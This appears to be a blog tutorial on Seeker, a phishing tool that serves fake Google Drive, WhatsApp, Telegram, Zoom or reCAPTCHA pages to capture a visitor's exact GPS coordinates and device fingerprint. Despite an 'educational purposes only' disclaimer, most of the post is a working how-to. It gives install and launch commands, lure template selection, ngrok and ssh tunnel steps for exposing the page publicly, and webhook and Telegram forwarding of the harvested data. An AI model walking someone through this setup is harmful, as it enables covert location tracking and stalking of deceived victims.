Introduction to Seeker
Seeker is a powerful open-source tool designed to demonstrate how malicious websites can exploit location-based permissions and gather sensitive information. Unlike conventional phishing tools that harvest credentials, Seeker simulates a fake webpage requesting location permissions from users. If a user allows the request, Seeker captures precise geographic coordinates along with detailed device information, showcasing how critical permissions like location can be exploited.
Seeker is a proof-of-concept tool created for educational purposes only, highlighting the risks of interacting with untrusted websites and granting unnecessary permissions. Developed by thewhiteh4t, the tool uses advanced methods to collect data and underscores the need for vigilance in cybersecurity.
Features of Seeker
Seeker gathers a wide range of information, divided into two main categories: Location Data and Device Information.
1. Location Data
When the target grants location permissions, Seeker collects:
- Longitude and Latitude: Pinpoints the exact geographic location.
- Accuracy: Usually within 30 meters for smartphones.
- Altitude: Available if the device supports altitude data.
- Direction and Speed: Captured if the user is moving.
2. Device Information
Seeker gathers the following details without any explicit user permission:
- Unique device ID via Canvas Fingerprinting.
- Device Model and Operating System (if available).
- Platform details (e.g., Android, iOS, etc.).
- CPU Cores and RAM (approximate values).
- Screen Resolution and GPU Information.
- Browser Name and Version.
- Public and Local IP Address.
- Local Port.
Additionally, Seeker performs automatic IP reconnaissance, further analyzing the gathered IP address for geographic and ISP information.
Why Seeker is Unique
Unlike traditional IP geolocation tools that rely on ISP data for approximate locations, Seeker uses the HTML5 Geolocation API to gather precise coordinates from the device's GPS hardware. This ensures high accuracy, often pinpointing within 30 meters. If GPS is unavailable (e.g., on laptops), Seeker falls back to IP geolocation or cached coordinates.
How Seeker Works
Seeker hosts a fake webpage designed to mimic popular platforms like Google Drive, WhatsApp, or Telegram. When the target visits the page and grants location permissions, the tool captures their location and device data.
Accuracy Factors
- Device Hardware: Requires a functional GPS module.
- Browser Support: Some browsers block JavaScript or restrict location access.
- GPS Calibration: Improperly calibrated GPS can lead to inaccurate results.
Templates Available in Seeker
Seeker offers a variety of templates to simulate different types of websites:
- NearYou: A generic template.
- Google Drive: Suggested by @Akaal_no_one.
- WhatsApp: Suggested by @Dazmed707.
- Telegram: Made by @a7maadf.
- Zoom: Created by @a7maadf.
- Google reCAPTCHA: Made by @MrEgyptian.
These templates make it easier to convince targets to interact with the fake page.
Ethical Use of Seeker
This tool is for educational purposes only. It demonstrates the types of data malicious websites can gather, emphasizing the importance of avoiding unknown links and not granting unnecessary permissions. Misusing Seeker for unethical purposes is illegal and against the intended use of the tool.
Installation Guide
Seeker can be installed on Kali Linux, Termux, or similar environments. Here’s how to set it up:
Step 1: Clone the Repository
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
Step 2: Set Permissions and Install Dependencies
chmod +x install.sh
./install.sh
Step 3: Launch Seeker
Run the following command to start Seeker:
python3 seeker.py
Usage Instructions
Seeker provides several options to customize the attack setup:
Basic Usage
To launch Seeker on the default port (8080):
python3 seeker.py
Use Custom Port
Specify a custom port with the -p option:
python3 seeker.py -p 1337
Generate KML File
Create a KML file (for Google Earth) containing location data:
python3 seeker.py -k <filename>
Select a Template
Choose a specific template using the -t option:
python3 seeker.py -t 1
Enhancing Seeker with Tunnel Services
To make Seeker accessible over the internet, use a tunnel service like ngrok or localhost.run.
Using ngrok
1. Start Seeker:
python3 seeker.py
2. Open another terminal and start ngrok:
./ngrok http 8080
Using Localhost.run
Alternatively, use the following command:
ssh -R 80:localhost:8080 nokey@localhost.run
Advanced Features: Webhooks and Telegram Integration
Sending Data to a Webhook
Configure a webhook endpoint to receive events:
python3 seeker.py --webhook <WEBHOOK_URL>
Telegram Bot Integration
Send collected information to a Telegram bot:
python3 seeker.py --telegram <token:chatId>
Conclusion
Seeker is an advanced tool designed to raise awareness about the potential dangers of granting location permissions and interacting with unknown websites. By simulating real-world scenarios, Seeker highlights the importance of cybersecurity practices, such as avoiding random links and understanding the permissions granted to websites.
Post a Comment